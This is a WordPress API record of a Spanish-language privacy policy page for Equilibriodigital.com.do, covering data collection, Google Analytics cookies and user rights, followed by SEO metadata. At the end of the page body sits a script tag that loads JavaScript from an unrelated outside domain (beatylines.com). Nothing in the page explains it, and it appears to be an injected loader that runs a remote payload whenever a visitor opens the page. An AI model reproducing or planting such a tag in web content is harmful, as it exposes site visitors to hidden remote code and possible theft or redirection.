{"id":3,"date":"2019-07-29T17:54:30","date_gmt":"2019-07-29T15:54:30","guid":{"rendered":"https:\/\/equilibriodigital.com.do\/site\/?page_id=3"},"modified":"2019-11-13T10:42:24","modified_gmt":"2019-11-13T14:42:24","slug":"politica-privacidad","status":"publish","type":"page","link":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/","title":{"rendered":"Pol\u00edtica de privacidad"},"content":{"rendered":"\r\n\r\n\r\n<p>En esta p\u00e1gina se describen las Pol\u00edticas de Privacidad tomadas por <span class=\"owner\"><strong>Equilibriodigital.com.do<\/strong><\/span>\u00a0en la gesti\u00f3n de su sitio web y en lo que respecta al tratamiento de los datos personales de los visitantes.<\/p>\r\n<p><strong><em>TITULAR DATOS PERSONAL<\/em><\/strong><\/p>\r\n<p>El titular de los datos personales es <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>, Distrito Nacional, Santo Domingo (<em>Rep\u00fablica Dominicana<\/em>). Los datos personales comunicados por los visitantes del sitio web que solicitan informaci\u00f3n s\u00f3lo se utilizan para llevar a cabo las demandas y no son revelados a terceros. Los visitantes que utilizan correo electr\u00f3nico o formulario de contacto para solicitud, informaci\u00f3n, comunicaran datos personales como: nombre, apellidos, correo electr\u00f3nico, ciudad, ecc. A falta de consentimiento para el tratamiento de los datos personales, <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>\u00a0no puede aceptar solicitudes de informaci\u00f3n.<\/p>\r\n<p><strong><em>TIPO de DATOS TRATADOS<\/em><\/strong><\/p>\r\n<p>Los sistemas inform\u00e1ticos y los procedimientos para el funcionamiento del sitio web <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>\u00a0graban algunos datos que est\u00e1n impl\u00edcitos en el uso de protocolos de comunicaci\u00f3n de Internet. Esta informaci\u00f3n no se recoge para estar asociado a interesados, pero que por su propia naturaleza podr\u00edan, a trav\u00e9s de la transformaci\u00f3n y la asociaci\u00f3n con los datos en poder de terceros, permitir la identificaci\u00f3n de los usuarios. En esta categor\u00eda de datos se incluye las direcciones IP de los usuarios que se conectan al sitio web, las direcciones URI (<em>Uniform Resource Identifier<\/em>) de los recursos solicitados, el m\u00e9todo utilizado para presentar la solicitud al servidor, el tama\u00f1o obtenidos en los archivos de respuesta, el c\u00f3digo num\u00e9rico que indica el estado de la respuesta del servidor y otros par\u00e1metros relacionados con el sistema operativo inform\u00e1tico. Estos datos se utilizan \u00fanicamente para obtener informaciones estad\u00edsticas an\u00f3nimas sobre el uso del sitio web <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong><span class=\"owner\"><strong>\u00a0<\/strong><\/span>y vigilar la correcta aplicaci\u00f3n. Tambi\u00e9n podr\u00eda utilizarse para establecer la responsabilidad por uso il\u00edcitos, como los cr\u00edmenes inform\u00e1tico contra el sitio web.<\/p>\r\n<p><b><i>INTRODUCCI\u00d3N<\/i><\/b><strong><em>\u00a0de DATOS\u00a0<\/em><\/strong><b><i>VOLUNTARIA\u00a0<\/i><\/b><\/p>\r\n<p>El env\u00edo facultativo, expl\u00edcito y voluntario de informaci\u00f3n utilizando formulario presente en el sitio web <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>\u00a0o por correo electr\u00f3nico a las direcciones que figuran en este sitio web implica la adquisici\u00f3n del remitente, necesario para responder a las solicitudes, as\u00ed como cualquier otro dato personal incluido en la solicitud.<\/p>\r\n<p><strong><em>COOKIES<\/em><\/strong><\/p>\r\n<p><span class=\"owner\"><strong>Equilibriodigital.com.do<\/strong><\/span>\u00a0no recoge autom\u00e1ticamente ninguna informaci\u00f3n personal de los visitantes de su sitio web. El sitio web utiliza <em>Google Analytics<\/em> como servicios de an\u00e1lisis web. <em>Google Analytics<\/em> utiliza cookies, archivos de texto que se almacenan en su ordenador, para vigilar la utilizaci\u00f3n del sitio web <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>. A trav\u00e9s de los <span class=\"owner\">cookies<\/span>, <em>Google Analytics<\/em> recopila los informes estad\u00edsticas de <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>. El monitoreo se hace de manera an\u00f3nima. <em>Google<\/em> podr\u00e1 transmitir dicha informaci\u00f3n a terceros cuando as\u00ed lo requiere la ley o cuando dichos terceros procesen la informaci\u00f3n. <strong>Equilibriodigital<\/strong><strong>.com.do<\/strong>\u00a0utiliza la informaci\u00f3n de <em>Google Analytics<\/em> para mejorar la navegaci\u00f3n del sitio web y los servicios ofrecidos. En el uso del sitio web los visitantes da su consentimiento al tratamiento de los datos adquiridos a trav\u00e9s de los cookies en la forma y para los fines anteriormente dicho. Puede rechazar el uso de cookies seleccionando la configuraci\u00f3n apropiada en su browser (<em>navegador<\/em>), sin embargo, esto puede impedir el uso de algunas de las caracter\u00edsticas del sitio web. La mayor\u00eda de los browsers (<em>navegadores<\/em>) est\u00e1n inicialmente configurados para aceptar cookies autom\u00e1ticamente, pero si lo desea, puede cambiar las preferencias para rechazar siempre todos los cookies, o aceptar algunos de ellos.<\/p>\r\n<p><strong><em>MODALIDADES de TRATAMIENTO<\/em><\/strong><\/p>\r\n<p>Los datos personales se procesan en forma papelera y\/o con herramientas automatizadas s\u00f3lo por el tiempo necesario para lograr los fines por los que fueron recogidos.<\/p>\r\n<p><strong><em>DERECHOS de los INTERESADOS<\/em><\/strong><\/p>\r\n<p>Los usuarios tienen derecho a obtener, en cualquier momento, la confirmaci\u00f3n de la existencia de sus datos y verificar su exactitud o pedir su integraci\u00f3n, la actualizaci\u00f3n, rectificaci\u00f3n o supresi\u00f3n.<\/p>\r\n<p>&nbsp;<\/p>\r\n<p><strong><em>INFO y PREGUNTAS<\/em><\/strong><\/p>\r\n<p><em>Email<\/em>: <strong>contacto@equilibriodigital.com.do<\/strong><\/p>\r\n\r\n\r\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script>","protected":false},"excerpt":{"rendered":"<p>En esta p\u00e1gina se describen las Pol\u00edticas de Privacidad tomadas por Equilibriodigital.com.do\u00a0en la gesti\u00f3n de su sitio web y en lo que respecta al tratamiento de los datos personales de los visitantes. TITULAR DATOS PERSONAL El titular de los datos personales es Equilibriodigital.com.do, Distrito Nacional, Santo Domingo (Rep\u00fablica Dominicana). Los datos personales comunicados por los &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-3","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pol\u00edtica de privacidad - EquilibrioDigital<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edtica de privacidad - EquilibrioDigital\" \/>\n<meta property=\"og:description\" content=\"En esta p\u00e1gina se describen las Pol\u00edticas de Privacidad tomadas por Equilibriodigital.com.do\u00a0en la gesti\u00f3n de su sitio web y en lo que respecta al tratamiento de los datos personales de los visitantes. TITULAR DATOS PERSONAL El titular de los datos personales es Equilibriodigital.com.do, Distrito Nacional, Santo Domingo (Rep\u00fablica Dominicana). Los datos personales comunicados por los &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/\" \/>\n<meta property=\"og:site_name\" content=\"EquilibrioDigital\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/profile.php?id=100068276827874\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-13T14:42:24+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@EquilibrioRD\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/\",\"url\":\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/\",\"name\":\"Pol\u00edtica de privacidad - EquilibrioDigital\",\"isPartOf\":{\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#website\"},\"datePublished\":\"2019-07-29T15:54:30+00:00\",\"dateModified\":\"2019-11-13T14:42:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/equilibriodigital.com.do\/site\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edtica de privacidad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#website\",\"url\":\"https:\/\/equilibriodigital.com.do\/site\/\",\"name\":\"EquilibrioDigital\",\"description\":\"Mucho m\u00e1s que informaci\u00f3n!\",\"publisher\":{\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/equilibriodigital.com.do\/site\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#organization\",\"name\":\"EquilibrioDigital\",\"url\":\"https:\/\/equilibriodigital.com.do\/site\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/equilibriodigital.com.do\/site\/wp-content\/uploads\/2019\/08\/logoed2-1.png?fit=599%2C112&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/equilibriodigital.com.do\/site\/wp-content\/uploads\/2019\/08\/logoed2-1.png?fit=599%2C112&ssl=1\",\"width\":599,\"height\":112,\"caption\":\"EquilibrioDigital\"},\"image\":{\"@id\":\"https:\/\/equilibriodigital.com.do\/site\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/profile.php?id=100068276827874\",\"https:\/\/x.com\/EquilibrioRD\",\"https:\/\/www.instagram.com\/equilibriodigitalrd\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edtica de privacidad - EquilibrioDigital","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/","og_locale":"es_ES","og_type":"article","og_title":"Pol\u00edtica de privacidad - EquilibrioDigital","og_description":"En esta p\u00e1gina se describen las Pol\u00edticas de Privacidad tomadas por Equilibriodigital.com.do\u00a0en la gesti\u00f3n de su sitio web y en lo que respecta al tratamiento de los datos personales de los visitantes. TITULAR DATOS PERSONAL El titular de los datos personales es Equilibriodigital.com.do, Distrito Nacional, Santo Domingo (Rep\u00fablica Dominicana). Los datos personales comunicados por los &hellip;","og_url":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/","og_site_name":"EquilibrioDigital","article_publisher":"https:\/\/www.facebook.com\/profile.php?id=100068276827874","article_modified_time":"2019-11-13T14:42:24+00:00","twitter_card":"summary_large_image","twitter_site":"@EquilibrioRD","twitter_misc":{"Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/","url":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/","name":"Pol\u00edtica de privacidad - EquilibrioDigital","isPartOf":{"@id":"https:\/\/equilibriodigital.com.do\/site\/#website"},"datePublished":"2019-07-29T15:54:30+00:00","dateModified":"2019-11-13T14:42:24+00:00","breadcrumb":{"@id":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/equilibriodigital.com.do\/site\/politica-privacidad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/equilibriodigital.com.do\/site\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edtica de privacidad"}]},{"@type":"WebSite","@id":"https:\/\/equilibriodigital.com.do\/site\/#website","url":"https:\/\/equilibriodigital.com.do\/site\/","name":"EquilibrioDigital","description":"Mucho m\u00e1s que informaci\u00f3n!","publisher":{"@id":"https:\/\/equilibriodigital.com.do\/site\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/equilibriodigital.com.do\/site\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/equilibriodigital.com.do\/site\/#organization","name":"EquilibrioDigital","url":"https:\/\/equilibriodigital.com.do\/site\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/equilibriodigital.com.do\/site\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/equilibriodigital.com.do\/site\/wp-content\/uploads\/2019\/08\/logoed2-1.png?fit=599%2C112&ssl=1","contentUrl":"https:\/\/i0.wp.com\/equilibriodigital.com.do\/site\/wp-content\/uploads\/2019\/08\/logoed2-1.png?fit=599%2C112&ssl=1","width":599,"height":112,"caption":"EquilibrioDigital"},"image":{"@id":"https:\/\/equilibriodigital.com.do\/site\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/profile.php?id=100068276827874","https:\/\/x.com\/EquilibrioRD","https:\/\/www.instagram.com\/equilibriodigitalrd\/"]}]}},"jetpack_sharing_enabled":true,"jetpack_likes_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/PbgY3Z-3","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/pages\/3","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/comments?post=3"}],"version-history":[{"count":1,"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/pages\/3\/revisions"}],"predecessor-version":[{"id":3525,"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/pages\/3\/revisions\/3525"}],"wp:attachment":[{"href":"https:\/\/equilibriodigital.com.do\/site\/wp-json\/wp\/v2\/media?parent=3"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}